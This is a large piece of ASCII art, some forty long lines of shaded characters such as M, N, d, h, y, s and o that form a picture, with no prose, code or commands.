MMMMMMMMMMMMMMMMMMMMMMMMMMMNMy/`-+syyyyyyyyyyyyyyyyysssssssssssssssssssssssssssssssssoooooooooooooooooooooooosooosssssssooo++++++++++++//++++++ooooooooooooooossssoooooooo+++/////////////////////////////////////////////////////////////////////:::::::://::::::::::::::::////////////////////+++++++++++++++oooooosssssssssssssssooooooooo++++++++++++++oooooooooooossssyyyhhhhhhhyyyyyyyyyhhhhyyysssooooo+oooossssyyyyyyyyyysssooooooooooooooo++/:::////////////+++ooosssyyyhhhdddhymMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMy-`:osyyyyyyyyyyyssssssssssssssssssssssssssssssssssssssoooooooooooooooooossssssssssssssssssooooooooo++++++++++++++++++++ooooooooooooooooooooo++++++/++++////////////////////////////////////::::::::::////////////::::::::::::::::::::::::::::////////////////++++++++++++++++ooooossssssyyyyyysssssssoooooo+++++++//+++++++++++ooooooosssyyyhhhhhhhyyyyhhhhdddddhhhyysssyyyyyssssssooooooooo+//:::---------:::::--........------------:://++oooossssysshNMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNs.`.+yyyyyyyyyysssssssssssssssssssssssssssssssssssssssooooooooooooooooossssssssssssssssssssssoooooo+++++++///////++++++++ooo++++++++osssssooo++++++++++//++//////////////////////////////::::::::::/:///////////::::::::::::::::::::::::::://///////////////++++++++++oooooooossssssyyyyyyyyyyyyyssssooooo++++//////////++++++oooooossssyyyhhhhhhhhhhdddmmmmmmmmddddhhhso++///:------:--:---...````````........`````````...---......--::///////++++++/++yMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNs-.++yyyyyyyyyssssssssssssssssssssssssssssssssssooooooooooooooooooooooooooooooossssssssssssssoooo+++++//////////++++/////::::---::+syyyyysso++++++++++++++//////////////////////////////:::://///:::::::::::::::::::::::::::::::::::::::://///////////////+++++++++oooooooossssyyyyyyyyyyyyyyyssssoooo+++//////////////++++++ooooossssyyyhhhhhhhhddmmmmmmmmmmdddhyso+/--....`............``````````.....--..........--::::::::::////+++o+++////////:`:yMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMm+:.+yyyyyyyyyssssssssssssssssssssssssssssssssssooooooooooooooooooooooooooooooosssoossssssssoooo+++++////////+++++/::----.......-/+shhdhyysoo+++++++++++++/////////////////////////////::://///:://///:::::::::::::::::::::::::::::::::::///////////////++++++++++oooooooosssyyyyyyyyyyyyyyssssooo++++//////:::::////++++++++oooosssssyyyyhhhhhdddmmmmmmdddhhyyso+/:--.........---------....-------::://////::////++oossyssssssyyyyyyysoo+++///////-+mMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNo`syyyyyyyyyyyyyyyyyyyyyyssssssssssssssssssssoooooooooooooooooooooo++oo+++oooooooooooooooooooo++++++++++++++++/::---.........-:+shdddhysoo++o++++++++++++++/////////////////////://:::://////////////::::::::::::::::::::::::::::::::://////////////++++++++ooooooossssssyyyyyyyyyyysssooo+++++//////:://:::://///++++++++ooooossssyyyyyhhhhddddmmdddhhyysssso++////:::://///////////////////+++++++oooo++++ooooossssssssssssssssoo+++++++++++++/`-sdMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMy.:++syyyyyyyyyyyyyyyyyyyyyyyyysssssssssssssssossooooooooooooooooo++++++++++++++++++++++++ooooooooooooooooo++++//::--....---::+sdmmmmdyyso++ooooo+++++++++++//////////////////////////://///////////::::::::::::::::::::::::::::::::::://///////////++++++++ooooooosssssssyyyyyysssoooo++++++///////:::::/:::///++++++++++ooooosssssyyyyyhhhhhdddddhhhhyyssooooo+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++oooooooooooo+---dddMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMo++.-ymhyyyyyyyyyyyyyyyyyyyyyyyyyyyssssssssssssssoooooooooooooooo++++++++++/////////////++++++++++ooooooooooooo+++///////+osyhddmmmdhhysoo+ooooo++++++++++++++++++//////////////////////////////:/:::::::::::::::::::::::::::::::://///////////////+++++++oooooooooossssssssssssooooo+++++++////////://////////+++++++oooooooosssssyyyyyyhhhhhhhhhhhhyyysssssooooooo+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ooooosssssssssssso/+.+mMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMhohMmyyyyyyyyyyyyyyyyyyyyssyyyyyyyyysssssssssssssssoooooooooooooooo+++++++////////////////////+++++++++++++o++ooooosssyyyhhhhhhhhyysooooooooo++++++++++++++++++++///////////////////////////::::::::::::/:::::::::::::::::::::://///////////////+++++++oooooooooosssssssssssssoooo++++++//////////////////++++++++oooooooossssssyyyyyyyyhhhhhhhhhhyyyssssssooooooo+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++oooooosssssssssssyyyhs-/MMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMs.+mNhyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyssssssssssssooooossooooooooooo+++++++++/////////////////////////////////++++++oooooooosssssooooooooooooo+++oo+++++++++++++//+++////////////////////////////::::::/:::::::::::::::::::::///://///////////++++++++oooooooooossssssssssssooooo+++++++///////////////++++++++++oooooooooossssyyyyyyyyhhhhhhhhyyyyyysssssooooooooooo++++++++++++++++++++++++++++++++++++++++++++++++++++oooooossssssyyyyyyyyyyyyh/:MMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMN--syyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyysssssyysssssssssssoooooooooo+++++++++++//////////////////////////////++++++++++++++++++ooooooooooooooo++oo+++++++++++++++++/////////////////////////////::::://:::::::::::::::::::://////////////////+++++++++oooooooooooossssssssooooo+++++//////////////++++++++++ooooooooooooossssssyyyyyyyyyyyyyyyyyyyyssssssooooooooooo++++++++oooooooo+++++++++++++++++++oooo++++++ooooooooosssssssyyyyyyyyyyyyyhyyydMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMs:::-+hhyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyddddddddhhhyysssoooooo+++++++++++/////////////////////////++////+++///++++++++++++++++oooooooooooooooo++++++++++++++++++////////////////////////////:::::::::::::::::::://:::://////////////////+++++++++oooooooooooooooooooooo++++++++++++/////++++++++++++ooooooooooooooosssssssyyyyyyyyyyyyyyyyssssssssssooooooooooooooosyhhdddddddddhhhhhyyyysssssssssooooooooooooosssssyyyyyyyyyyyyyyyyhhhhhhhhhhMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMm:`hNdhhyyyyyyyyyyyyyyyyyyyyyyyyyyyyhhhhhhhhddhhhdhhdddhyhhhhhysso+++++++///////////////////////////++++++///////++++++++++++++++++++oooooooooooooooo+++++++++++++++++/////////////////////////////////:::::///////////////////////////////++++++++++++++ooooooooooooooooo++++++++++++++++++++++oooooooooooooossooooossssssssssyyyyyyyyyyyyssssssssssssooooooooooosydmNNNNNNNNNmmmmmmmmmdddddddddmmmmddhhysssssssyyyyyyyyyyhhhhhhhhhhhhhhhdddddhhMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM/`:ydyyyyyyyyyyyyyyyyyyyyyyyyyhhhhdhhhhhhhhhhhhhhhhhhhhhddddddddsoooo++++++///++////////++///+++/+//+++++++++++++++++++++++++++++++ooooooooooooooooooo+++++++++++++++++//////////////////////////////////////////////////////////////////++++++++++++++++++++++++++ooooo++++++++++ooooooooooooooooooooooooooossssssssssssssssssssyyysyyyyyssssssssssssoooooooooshmNNNNNNmmmmmmddddddddddddddddddddddmmmmNNmmdhhyyyyyhhhhhhhhhhhhhddddddddddmddhmMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMmh:-+syyyyyyyyyyyyyyyyyyyyhdhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhdddddhyso++++//+++//+++++++++++++++++++++++++++++++++++++++++++++++ooooooooooooooooooooooooo++++++++++++++++++/////////////////////////////////////////////////////////////++++++++++++++++++++++++++oo+o+++ooooooooooooooooooooooooooooooooooossssssssssssssssssssssssssssssssssssssooosssoosydmNNNNmmmmmdddddddddddddddddddddddddddddddmmmNNNNmmdhhhhhhhhdddddddddddddddmmmdhymMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMN/`-yyyyyyyyyyyyyyyyyhhhhhhhhhhhddddddddddddddddddddddddddddddhdddddmhs++++/++++++++++++++++++++++++++++++++++++++++++++++++++ooooooooooosooooooooooooooooo++++++++++++++++++++++++++++///////////////////////////////////////////+++++++++++++++++++++++++++++++oooooooooooooooooooooooooooooooooooooooossssssssssssssssssssssssssssssssssssssssoooossssydmNNNmmmmdddddddddddddddddddddddddddddddddddddddmNNNNNmmddddddddddddddddddddddmdhy.sMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMs.:hdhyyyyyyyyyyyyyhhhhhdddddddddddddmdddddddddddddddddddddddddddddddhso++++++++++++++++++++++++++++++++++++++++++++++++++++++oooooooossssssssssssooooooooooo++++++++++++++++++++++++++++++++++//////////+++/+++++++++++++++++++++++++++++++++++++++++++++++ooooooooooooooooooooooooooooooooooooooossssssssssssssssssssssssssssssssssssssssssssssssssydmNNmmmmmmdddddddhddddddddddddmmmmddddddddddddddddddmmNNNNNmddddddddmmmmmmddddddhy+-.yMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMy.:+yyhhyyyyyhhhhhhhdddddddddddmmmmddddddddddddddddddddddddddddddhdddddoo+++++++++++++++++++++++++++++++++++++++++++++++++oooooooooooosssssssssssssssssooooooo++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++oooooooooooooooooooooooooooooooooooooossssssssssssssssssssssssssssssssssssssssssssssssssssssssssyhmNNNmmmddddddddddddddddmmmmmmmmmmmmmmmmmmmmmdddddddddddmmNNNNmdddddddmmmmmmddhhys:-/mNMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNhs.:syyyyyyyhhhhdddddddddmmmddhyso++////////+++osyhddddddddddddddddddddmy+++++++++++++++++++++++++++++++++++++++++++++++oooooooooooooossssssssssssssssssssoooooooooooo++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ooo+++++++ooooooooooooooooooooooooooooooossoooooooooossssssssssosssssssossssssssossssssssssssssssssssssssssssssshmNNNmmmdddddddddddmmmmmmmmddhyyssssssyyhddmmmmmmmmmdmdmddddmmNNNmdddddmddddddhhy+.`/NMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMh++sssyyyhhhdddddddddmdhyo+//+osyyyyyyyyyso//++/++oyhdddddddddddddddddmhs++++++++++++++++++++++++++++++++++++++++++ooooooooooooooooosssssssssssssssssssssssssssoooooooooooooo+++++++++oooo++ooooo++++++++++++++++ooooooooooooooooooooooooooooooooooooooooooooooooooooossssoossoooossssssssssssssssssoossssssssooooosssssssossssossssssssssssydNNNmmmmddddddddddmmmmmdhso+//+++ooooooo++/+ooshddmmmmmdmmmddddmmNNmddddddddddhy/-./mMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMm.syhhhhhhdddddddmdhy+//osyhhhhhhhhyyso:.```.../yso+oyhddddddddhdddddmmdyo+++++++++++++++++++++++++++++++++++++oooooooooooooooooooossssssssssssssssssssssssssssssssoooooooooooooooooooooooooooooooooooooooo+ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooossssssooosssssssssssooossssoosoooooooooooosssssssssoooooooossssssssymNNNmmmdddddddddmmmmmds+::/+oyysyhdhhdddhhhyso++++oyddmddddmmdddddmNmdddddddddy+yhmMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNoshhhhdddddddmdds//+sssosshmNNNNNNmh+.```.``.:syhyyo+ohddddddddddddddmmdyo+++++++++++++++++++++++++++++++++++ooooooooooooooooossssssssssssssssssyyssssssssssssssssssoooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooossssssssssssssssssssssssssooossssssssssoooooooooooooooooooooooosssooooooooooooossososymNNNmmmddddddddmmmmdy+:/++/---:/ymNNNNNNdo/-....-+++ooshddmmdddddddmmmdddddhhhy-:NMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMmdhhhdddddddmmds/+s+-...--:ymNNNNNmmh+-..-../osyysyhhysooydddddddddddddmmmhs++++++++++++++++++++++++++++++++++oooooooooooooooooossssssssssssssssssssssssssssssssssssssssssssssssssssssooooooooooooooooooooooooooooooooooooosssssoooosooooooooooooossssssssssssssssssssssssssssoosssssssssssooooooooooooooooooooooooooooooooooooooooooooymNNmmmdddddddddmdmds/:oyo:..--.-/hmNNNNNNNy:` `...../yysoohdddmdddddddmddhhhyys--hMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNhhhddhhddddmdy++ys/-....--:sdNmmmdhhs:/++/:+syydmmNNmhyysoohddddddddddddmmmds+++++++++++++++++++++++++++++o+ooooooooooooooooossssssssssssssssssssssyyyyyyyyyyyyyyyyssssssssssssssssssssssssssssssssossoosssssssssssoossoooooossssssssssssoooooosssssssssssssssssssssssssssssssssssssssssssoooooooooooooooooooooooooooooooooooooooooooosdNNmmmddddddddmmmmy//syyyso+:.--`.:syyhdmmmo.```...:osyyyysoshddddmddddmdhhhyyys--MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMdhhhhddddddmmdyoshhss+:-::..--/ydmhyss+/oosooyysymmNNNNmdssyo+sdhddddddddddmmmhs++++++++++++++++++++++++++++ooooooooooooooooooooossssssssssssssssssssssssyyyysyyyyyyyyyyyyyyyyssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssosssssssssssssssssssssssssssssssssoooooooooooooooooooooooooooooooooooooooooooooooooooooooooohNNmmmmddddddddmmdo:oyhysyyyss:-/:``:osydmdo.``.:../syyyooyyyoohmdddddddddhhyyyss-`oMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMyhyhdddddmdmdyoyyyhhyys+:///-..-+ydhhy/ossooyysyhhhdmNNNNmhyys+oddddddddddddmmmdyo+++++++++++++++++++++++++++ooooooooooooooooooooosssssssssssssssssyyssssyyyyyyyyyyyyyyyyyyyyyyyyyyysssssyyyyyyysssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssooooossoooooooooooooooooooooooooooooooooooooooooooooooooooooooymNNmmmddddddddmmh//syhmmmmdssyy+:oo:.:shddo.`-/o:-+yyhmmh+oyyysoyddddmmdddhyyyyyys. hMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMmyhddhddddmdhsyyyyyhdhhyyo//+o:..-+o+:/sysosyysyhyyhdmmNmh+:+ss+odhddddddddddmmNmhso++++++++++++oo+++++++oooooooooooooooooooooooooosssssssssssssssssssssyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyssssssssyyyssssssssssssssssssssssssssssssssssssssssssssssssssssssoooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooohNNmmmdddddddmmmh/+soymNNNmmhosyyo/oso:/oo/-:/os::ossyssdmdhdhyysohddddmmddhhhyyysy/ hMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNhhhdddddmmmdyyyyoymNNNmhssso/+ss+-..../+oosyysoddhhhhhyso/-..-+s+sdddddddddddmmNNNdso++++++++++o++++++++++ooooooooooooooooooooooooosssssssssssssssssssssssssyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyssssssssssssssssssssssssssssssssssssssssssssoooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooosdNNmmddddddmmmmh++sosmNNmhyhdhoosys+oso:.-.-+so/+ssoys::+hmhsosyyoshddddmdddhyhhyys/ dMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMmhhhdddddmmdysyysymNmmmmddyssyo+oo+//:/+ossss+:-/+++:-.````....-+oohdhddddddddmmNNNNmy+++++++++++++++++++ooooooooooooooooooooooosssssssssssssssssssssssssssssyyyyyyyyyyyyyyyyyhhhhhhyyyyhhhhhhhhyhhhhhhyhhyyyyyyyyyyyyyyyyyyyyyyyyyyyyyysssssssssssssssssssssssssssssssssssssoooooooooooooooooooooooooooooooooooooooooooooooooooooooooosdNmmdddddddmmmmy+ssshmNmhyyssyh++yys+oo/..-/osssysss+::::+dh+/+ssssyddddmmmdhhhhhysoodMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMhhhhdddddmmdyyyyohmyyshdmmmhooyyssssoossssssso/.``````..--://////ooydddddddddddmmNNNNh+++++++++++ooooooooooooooooooooooooossssssssssssssssssssssssyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhyyyyyyyyyyyyyyyyyyyyyyyyyyyyssssssssssssssssssssssssssssssooooooooooooooooooooooooooooooooooooooooooooooooooooooooooosdmmddddddddmmmdsos/-/shhyyyysss:-:++osssooossssso//oooo+/+s+-.-:ossydddddmmddhhhhyssNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNyhhddddddddhysysoyyssshdmmdds/ossssss+//+osssso::///////:://++oosssydhhdddddddmmmNNNNy+++++++++ooooooooooooooooooooossssssssssssssssssssssyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyhhhhhhyyhhhhhhhhhhhhhhhhhhhhhhhhhhhyyyyyyyyyyyyyyyyyyyyyyyyysssssssssssssssssssssssssssssssssoooooooooossssssoooooooooooooooooooooooooooooooosdmmdddddddddmmhss/.`.-----:://-..-+sssssooosossso---::----------:+sshddddmmdddhhhys/MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMmhhhddddddddysss/-:+ooooo++/:.`:+sssso/..--/ossssss+++osssyyyhhhhyssyddhddddddddmmNNNms++++++++ooo+++ooooooooooooosssssssssssssssssssssyssyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhyyyyyyyyyyyyyysyyssssssssssssssssssssssssssssssssssssssssssssoooooooooooooooooooooooooooooosdmmddddddddmmdhs+-`....-:/-......:ossso+//:/ossso-....-.--------:/oshdddddddddhhys/-MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMdhhdddddddddyss+.````````````..-/sssooo///+osssssyyyyyyyhhhyyhyysssoyddhdddddddmmmNNNdo++++++++++++ooooooooooooooooossssssssssssyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhyyyyyyyyyyyyyyyysssssssssssssssssssssssssssssssssssssssssssssssssssooooossoosssoooooossdmmddddddddddmyso//////+oo+////+ossssso+/:////osssso/////////+++/+oshddddmmmddhys::/MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMyhhdddddddddhso/..``...-:::///+osssso/+o+//+sssssssoshdhhdmmNNmdysooyddhddddddddmmNNmy++++++++ooooooooooooooossssssssssyyyyyyyyyyyhhhhhhhhhhhhhhhhhhhhhhhhhhyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyssssyysssyssssssssssssssssssssssssydmddddddddddmmhsssssssossssssssyyyyssso+++/--/ossyyyyysssssssssssssshddddmmmdhyyhhhNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMdyhdddddddddhoo+++++/:::://oosyyysssssooo+ossso+/:-/ymmmddmNNNmmo+ssydhhdddddddmmmNNdssoooooooooooooossssyyyyyyhhhhhhhhddddddddmmmmmmmmmmmmmmmmmmmmmmmmmmddddddhhhhyyyhhhhhhhhhhhhhyyyyyyyyyyyyyhhhhhhhhhhhhhhhhhhhdddddddddddddddddddddddddddhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhyyyyyyyyyyyyyyyyyyyyyyyyyyssssyyyyysyyyyyyyyyyydmdddddddddddmhsyyhhhhysssyhhhhys+ossssooo+ossssoossysssyhhhhhyyoooshddddmmmdhyhMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMohhdddddddddhs/-:/+++ossyyyyyhhys+/osossssssso/-...:+sdmmmNmNNmy:+sshdhhddddmmmmmNmmmdhhyyyssssssyyyhhhddddmmmmmmmmmmmmNNmmNNNNNNNNNNNNNNNNNNNNNNNNNNNNNmmmmmmmmddddddddddddddddddddddddddhhhhhhhhhhhdddhhhddhhddddddddddmmddmmmmmmmmmmmmmmmmmmmmmmmmmmmddddddddddddddddddddddddddddddddhhhhhhhhhhhhhhhhhhhhyyyyyyyyyyyyyhhhhyyyyyyyyyyyhmmmddddddddddddyso+shmhyyyhdmmdo/-://osyyysso+::-/ssoooosdmhso+///+shdddmmmmmddMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMosyhdddddddddh+--oyyyhyyyhhdddhyo/:---:+sssso+++/:-.--:oydmmmdh//sosdhhhddmmmmmmmmNmmmmNmmmddddhhdddmmmmmmmmmmmmmmmmmmmmmmmmmNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNmmmmmmmmmmmmmmmmmmmmmmmmmmmmmdddddddmddddddddddmmmmmmmmmmmmmmmmmNmNNNNNNNNNNNNNNNNNNNNNmNNNmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmddddddddddddddhhhhhhhhhhhhhdddhhhhhhhhhhhdmmmddddddddddddh+/:smNddddhmNmh:```.-:+sssso/-..`-+syddmmmmy+....-oyhhddmmmmdNNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMdooydddddddddds:../osyyyyhdmmmdy+-.`-::/osssyyss+/++/-..-/ooo+/:/+ohhhhdddmmmmmmmNNNNmNNMNNNNNNmmmmNmmNmmddmmNNNmNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNmddddddddddmmmmmmmmmNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNmmmmmmmmmmdmddmddmNNNNNNNNMNNMMMMMMMMMMMMmmmmmmmNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNmmmmmdddmmmmdddddddddmmddmddddmddddmddmNNmmddddddmddddds/-:ymmNNmmmds-```--:osssssos+::-`.:ymmNNmdo-````:shhddmmmmdNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMhsshdddddddddhs:...-+hdhhhhhddh+:::++osyhhdhhyyso+/+o/-.`...``--+ydhhddddmmmmmmNNNNNMMMMMMMMMMMMMMMMMMMm-.mMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMm-...........--------osoooooooohhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhmmmmmmmmmmmmmmmmmmmmmmmmmmMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMsshNNmNNmdddddddmmddddho..:sdmmNmy/.``-/:-oyyhdhhyss+/o/-.:shmmho- `-oyhhddmmmmNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMysyddddddddddhs:-..-+hdmdhhhh+:+osoosyyhmmhhddysys//oso/-.```-/yhhhdddmmmmmmmNMMMNMMMMMMMMMMMMMMMMMMMMMddMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNddddsssss:::-.... `` ........................./MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNNoNMMdNmmdddddddmdddddh+-.-oyo+/-..-oo/:oyyyhdmNhsyyo+ss+::oo+/.` `:oyhhdddmmmNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMmshyddddddddddhy+:---:oydddho/ossyssyyohmmmmmmdyssys++oss/.`-+yhhhddddmmmmmmNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNNNNmdddddddddddddddddddddddddddddddddddddddddddhsssss/:-.. `--------------- `.-:osyMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNMMMNNNmddddddmmddddddho-..-...:+oss++ssydhddmmd+syyssyyso:-.` `./shhhddddmdNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNo+ydddddddddddhs+:---:/+/::+ssyyyyysohmmmmddddhsosys+/:..:syhhhdddmmmmmmNNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNNNddddysyNNNNNNNNNNNNNNNssyddmNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNNmmddddddddddddddy/-...:ossy++ysohmmmNmmmy/syyyyyys+.```.:oyhhhddmmmmNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
